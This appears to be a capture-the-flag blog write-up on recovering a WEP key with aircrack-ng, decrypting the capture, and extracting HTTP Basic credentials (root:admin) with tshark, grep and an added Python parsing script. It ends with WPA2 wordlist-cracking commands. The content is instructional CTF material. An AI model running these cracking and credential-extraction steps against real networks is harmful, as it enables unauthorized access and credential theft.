Recently in a capture the flag event I had to use aircrack-ng to recover the WEP key from a packet capture, airdecap-ng to decrypt the WEP packets and write them out to a second capture, tshark to dump that capture to text, and finally a grep regular expression to extract the base64-encoded HTTP Basic Authentication username and password.
Below are the commands that I ran to accomplish this:
# aircrack-ng WIRELESS-C2.cap
Opening WIRELESS-C2.cap
Read 73650 packets.
# BSSID ESSID Encryption
1 00:40:10:20:00:03 Wireless Challenge Two WEP (25704 IVs)
Choosing first network as target.
Opening WIRELESS-C2.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25704 ivs.
Aircrack-ng 1.2 beta1
[00:00:00] Tested 397 keys (got 25082 IVs)
KB depth byte(vote)
0 2/ 4 DA(31232) C0(30976) 22(30720) E8(30720) 16(30208) 25(30208) D0(30208)
1 0/ 1 1C(35840) 03(32256) 7F(32000) B7(32000) F2(30464) 95(30208) 86(29952)
2 0/ 5 91(34048) CC(33792) 2D(32512) 58(31232) 84(31232) 2F(30720) 3D(30720)
3 5/ 26 0A(30208) 39(30208) 5B(30208) 62(29952) ED(29696) 02(29696) 2E(29696)
4 0/ 1 C4(35072) 19(31744) 31(30464) CD(30208) 10(29696) 6E(29696) D5(29696)
KEY FOUND! [ C0:1C:91:0A:C4 ]
Decrypted correctly: 100%
# airdecap-ng -w c01c910ac4 WIRELESS-C2.cap
## Open WIRELESS-C2-dec.cap in Wireshark
## Apply the filter (http.request.method == "GET") || (http.request.method == "POST")
## With the filter applied, find the request for the management.asp page
## Right-click it and choose Follow TCP Stream
## In the window that opens you will find the header "Authorization: Basic cm9vdDphZG1pbg=="
## The base64-encoded value is the admin username and password
## Decoded, the username and password are root:admin
## OR you can use tshark and export the packet information to a file
# tshark -V -r WIRELESS-C2-dec.cap > WIRELESS-C2-dec.txt
## Then write a short and sweet regex to extract base64 encoded strings
# grep -E '[A-Za-z0-9+/]{11,}={1,2}' WIRELESS-C2-dec.txt # Find base64 encoded text that is 11 characters or longer and ends in = padding
## Voila! Authorization: Basic cm9vdDphZG1pbg==\r\n
## Then you can decode it from the command line as follows
# echo "cm9vdDphZG1pbg==" | base64 -d
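The grep-and-decode step above is the part of this workflow that matters most from the defensive side: once a capture is decrypted (or was never encrypted), any HTTP Basic credentials in it are a single base64 decode away. The script below is an added example, not part of the original post, that does the same job over a tshark -V text dump but with two checks the bare regex lacks: it validates that a candidate really decodes as base64 (length a multiple of 4, strict alphabet) and that the result is printable text, which filters out hex session ids and other long alphanumeric tokens the grep would also report. The sample tshark lines are constructed for the example and reuse the root:admin token shown above; only the Authorization header line is real-looking, the frame and host values are invented.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed stand-in for a few lines of `tshark -V -r WIRELESS-C2-dec.cap` output.
# tshark prints the CRLF at the end of each HTTP header line as the literal text \r\n.
SAMPLE_TSHARK_TEXT = """\
Frame 1234: 512 bytes on wire
Hypertext Transfer Protocol
    GET /management.asp HTTP/1.1\\r\\n
    Host: 192.168.1.1\\r\\n
    Authorization: Basic cm9vdDphZG1pbg==\\r\\n
    Cookie: session=3f2a9c1d4e5b6a7f8e9d0c1b2a3f4e5d\\r\\n
Frame 1240: 96 bytes on wire
    Authorization: Bearer abcdefghijklmnopqrstuvwxyz==\\r\\n
"""

# Header-specific pattern: the token that follows "Authorization: Basic".
BASIC_AUTH_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/]+={0,2})")

# Generalisation of the grep on the page: any whole token of 11+ base64 characters,
# with optional padding, bounded so we do not match the tail of a longer word.
B64_CANDIDATE_RE = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{11,}={0,2}(?![A-Za-z0-9+/=])"
)


@dataclass
class BasicAuthHit:
    line_no: int
    token: str
    username: str
    password: str


def decode_base64_strict(token: str) -> Optional[bytes]:
    """Return the decoded bytes only if `token` is well-formed base64, else None."""
    if len(token) % 4 != 0:
        return None
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_printable_ascii(raw: bytes) -> bool:
    """True when the bytes are 7-bit ASCII with no control characters."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(32 <= ord(ch) < 127 for ch in text)


def find_basic_auth(text: str) -> List[BasicAuthHit]:
    """Locate HTTP Basic Authorization headers and split them into user and password."""
    hits: List[BasicAuthHit] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = BASIC_AUTH_RE.search(line)
        if not match:
            continue
        raw = decode_base64_strict(match.group(1))
        if raw is None:
            continue
        try:
            cred = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        user, sep, password = cred.partition(":")
        if not sep:  # Basic credentials are always user:password
            continue
        hits.append(BasicAuthHit(line_no, match.group(1), user, password))
    return hits


def find_base64_candidates(text: str) -> List[Tuple[int, str, str]]:
    """Every base64-looking token that decodes to printable text: (line, token, decoded)."""
    found: List[Tuple[int, str, str]] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in B64_CANDIDATE_RE.finditer(line):
            raw = decode_base64_strict(match.group(0))
            if raw is not None and is_printable_ascii(raw):
                found.append((line_no, match.group(0), raw.decode("ascii")))
    return found


if __name__ == "__main__":
    import sys

    # Pass a real tshark text dump as the first argument, otherwise use the constructed sample.
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_TSHARK_TEXT
    for hit in find_basic_auth(data):
        print(f"line {hit.line_no}: Basic auth user={hit.username!r} password={hit.password!r}")
    for line_no, token, decoded in find_base64_candidates(data):
        print(f"line {line_no}: base64 {token} -> {decoded!r}")
```

Run it against the text dump produced by the tshark command above (`python3 audit_basic_auth.py WIRELESS-C2-dec.txt`; the script name is my own). The hex cookie and the Bearer token in the sample both match the loose grep but fail the decode or printability check, so only the real Basic credential is reported; that is the difference between a regex that finds strings and a check that finds exposed credentials.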
# Note on WPA2 packet captures
# aircrack-ng <file>.cap -w Wordlist.txt
## Run against the capture with a wordlist to find the passphrase used
## Then to decrypt the packet capture
# airdecap-ng <file>.pcap -e <SSID> -p <password>
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.